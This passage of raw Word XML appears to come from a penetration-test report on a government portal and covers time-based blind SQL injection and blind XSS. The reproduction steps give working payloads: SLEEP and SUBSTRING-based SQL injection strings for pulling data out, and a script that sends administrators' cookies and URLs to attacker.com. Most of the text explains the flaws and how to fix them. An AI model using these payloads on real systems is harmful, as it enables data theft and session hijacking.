      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a robust defense-in-depth strategy that includes input validation at all tiers of the application (client-side, server-side, and database-level). Adopt an ORM (Object-Relational Mapping) framework or use parameterized queries/prepared statements for all database interactions across the application. This approach separates SQL code from user-supplied input, effectively preventing injection attacks. Implement a Web Application Firewall (WAF) to provide an additional layer of protection by detecting and blocking malicious SQL injection attempts. Regularly review and update security policies and conduct security awareness training for developers on secure coding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>practices.Implement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> least privilege principles for database user accounts, ensuring that application accounts only have the necessary permissions to perform their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>functions.TACTICAL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIX (Code Implementation):Rewrite all database query functions to use parameterized queries (e.g., Prepared Statements in Java, parameterized queries in .NET, or similar constructs in other languages). For example, instead of concatenating user input directly into SQL strings, use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>placeholders.Ensure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that all user-supplied input is validated and sanitized rigorously before being used in SQL queries. Implement positive validation (whitelist validation) where only known good input is accepted, rather than attempting to filter out known bad </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input.Avoid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dynamic SQL where possible. If dynamic SQL is absolutely necessary, ensure it is thoroughly reviewed and uses strong escaping mechanisms for all user-controlled </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>variables.Configure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>database to run with the principle of least privilege, meaning the database user account used by the application should only have permissions to perform its required functions (e.g., SELECT on specific tables, not DELETE or DROP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F48DC1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EEDCDD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify a vulnerable parameter in a web request (e.g., a GET parameter, POST body parameter, or cookie value). 2. Construct an initial request that includes a time-based payload. For example, append ' AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SLEEP(5)--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' to the parameter value. 3. Observe the server's response time. If the response is delayed by approximately 5 seconds, it indicates a potential time-based blind SQL injection vulnerability. 4. Systematically extract data by using conditional time-based payloads. For example, to check the first character of the database name:    Payload: ' AND IF(SUBSTRING(DATABASE(),1,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>',SLEEP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(5),</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0)--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' 5. Send this request and observe the response time. If the response is delayed, the condition is true. Iterate through possible characters until the correct one is found. 6. Repeat this process, incrementing the character position and testing different characters, to progressively </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extract</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the entire database name, table names, column names, and ultimately, sensitive data from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9BC327" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689AAA33" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-10/2021/A03_2021-Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10804A43" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/89.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD96C0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/sql-injection/blind/time-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D163F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB4835"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4C2EC5D0"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289DBA26" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Blind Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45FB13AE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL CVSS 9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3967A0F8"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560AB02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7970CDB"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8D50154" w14:textId="54115340"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-003</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EA0D033"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A6028D0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.0 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2481711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3153E28"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0FE6AE3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021-Injection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B573EBD"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D0E9BF2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="086A480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4DCB24A"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1B06B11"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8084F22"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1D08AD2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1157C3A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058D3D5"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AC37630" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Immediate</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799C0D0"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086E04D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2442E0A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EFA147E"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AF10769"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BB5EE55"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D850CA4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34B0F787" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0414CADE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Blind Cross-Site Scripting (XSS) is a specific type of XSS vulnerability where the attacker's payload is stored on the server and later executed in a different application or a different part of the application, often viewed by a privileged user (e.g., an administrator in a backend portal, or a customer support agent). Unlike reflected or stored XSS where the attacker sees the immediate impact, in blind XSS, the attacker injects malicious code without knowing where or when it will execute. The payload typically targets internal systems or personnel who interact with the stored data, allowing the attacker to steal cookies, session tokens, bypass access controls, perform unauthorized actions, or compromise internal systems. This occurs when user-supplied input is stored without proper sanitization and is subsequently displayed in an internal application that is vulnerable to XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB74B71" w14:textId="42B5CD45" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED5E8A6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The presence of Blind Cross-Site Scripting (XSS) on a government portal poses a severe risk to the organization's operational integrity, sensitive data, and public trust. Exploitation could lead to unauthorized access to internal administrative systems, allowing attackers to view, modify, or delete sensitive government data, including personally identifiable information (PII) of citizens. This directly violates NIST CSF principles for data protection and could result in significant regulatory fines and legal liabilities due to PII breaches. Beyond financial penalties, a data breach would severely damage the agency's reputation and erode public confidence in the government's ability to protect citizen data. Operational disruptions could occur if administrative systems are compromised, leading to service outages or manipulation of official information. The long-term costs associated with incident response, forensic investigations, legal fees, and reputational recovery would be substantial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4ADD6E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D967C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822DE80" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Implement </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a robust</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, centralized input validation and output encoding framework across all applications. This framework should be designed to sanitize or escape all untrusted data before it is stored or rendered in any part of the system, especially when interacting with internal applications or administrative interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBEAAF7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Adopt a strong Content Security Policy (CSP) with a strict whitelist approach for allowed sources of scripts, styles, and other resources. This helps mitigate XSS even if a vulnerability exists, by preventing the browser from loading malicious scripts from unauthorized domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1B71A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Conduct regular, comprehensive security training for all development teams, focusing on secure coding practices, common web vulnerabilities like XSS, and the importance of data sanitization and output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA0D1A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement an allow-list approach for all user input, only permitting characters and formats known to be safe and required for specific data fields, rather than attempting to blacklist malicious input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65822D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043FC920" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E137CC3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- For all user-supplied input, strictly validate and sanitize data on the server-side before storage. Utilize libraries designed for input validation (e.g., OWASP ESAPI, Apache Commons Text) to ensure data conforms to expected types, lengths, and patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5F7CA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Implement context-specific output encoding for all data retrieved from the database or other external sources before rendering it to the user's browser. Use appropriate encoding functions for HTML context (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) in PHP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HtmlEncoder.Encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>() in .NET, JSTL '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c:out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' in Java, template engine auto-escaping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361FEE01" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Avoid dynamically generating HTML or JavaScript directly from user input. If dynamic content is necessary, use templating engines with auto-escaping features or ensure all variables are explicitly encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA6C51" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- For JavaScript contexts, use JavaScript-specific encoding (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>() or custom encoding for specific HTML contexts within JavaScript) and place user-supplied data in JavaScript string literals, not directly as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A0BA1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Review and update all existing forms and data submission points on the gov portal to ensure they are applying the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aforementioned input</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> validation and output encoding techniques consistently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253D2624" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ECE6DB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Navigate to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the contact or feedback form on the government portal. 2. In a text field (e.g., "Message" or "Subject"), inject a malicious JavaScript payload designed to exfiltrate data to an attacker-controlled server. For example: &lt;script&gt;var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Image;i.src</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://attacker.com/log?c='+btoa(document.cookie+'&amp;url='+document.URL+'&amp;opener='+window.opener.location.href);&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/script&gt; 3. Submit the form. 4. The injected payload is stored in the backend database. 5. An administrator or internal user accesses an internal application (e.g., a customer support dashboard, an incident response system) to view the submitted feedback/message. 6. The malicious script is executed in the administrator's browser when the stored message is rendered, without proper sanitization. 7. The attacker-controlled server at 'https://attacker.com' receives the administrator's cookies, current URL, and potentially other sensitive information, confirming the blind XSS vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6126BD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
